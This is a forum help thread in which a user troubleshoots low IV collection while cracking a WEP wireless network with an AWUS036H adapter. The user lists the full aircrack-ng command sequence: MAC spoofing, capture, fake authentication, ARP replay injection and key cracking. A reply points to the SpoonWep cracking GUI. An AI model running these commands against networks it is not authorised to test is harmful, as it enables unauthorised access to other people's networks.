need help with awus036h

hi,

i'm trying to crack a wireless network (not for bad purpose, but for ethical hacking) and my awus036 works fine, but it doesn't seem to collect that many IVs per minute, I can get maybe 10 for each 3 minutes. what am i doing wrong?
here are the commands i use:

airmon-ng stop wlan0

macchanger --mac 00:11:22:33:44:55 wlan0

airmon-ng start wlan0

airodump-ng -c CHANNEL -w FILENAME --bssid BSSID wlan0

aireplay-ng -1 0 -a BSSID -h FAKED MAC -e ESSID wlan0

aireplay-ng -3 -b BSSID -h FAKED MAC wlan0

aireplay-ng -2 -p 0841 -c MAC -b BSSID -h FAKED MAC wlan0

aircrack-ng -n 128 -b BSSID filename-01.cap

please keep in mind that i'm not so experience wiht linux or backtrack

I would recmmend you to use SpoonWep 2 if you are a newbie and want to "cheat" and not to learn the right commands. SpoonWep is a graphical interface "cracking" software that i very much like. You can find the link to where to download if you google spoonwep 2.

Since im a newbie myself and dont know much about the raw commands i cant help you with your question precisely.

i think i have found the problem, it will not authenticate when i do

aireplay-ng -1 0 -a BSSID -h FAKED MAC -e ESSID wlan0

and i believe that's the reason why it wont inject aswell

i did the injection test also and it said it was working, so i think the only problem is that it wont do the fake authenticate

thanks for the answer, but how do i install spoonwep 2 on backtrack 4?

EDIT: okay, the fake authentication, i managed to make that work now, so it's still the problem that it wont inject anything/the IVs don't increase

edit2: just close this thread now, managed to make it work now =)
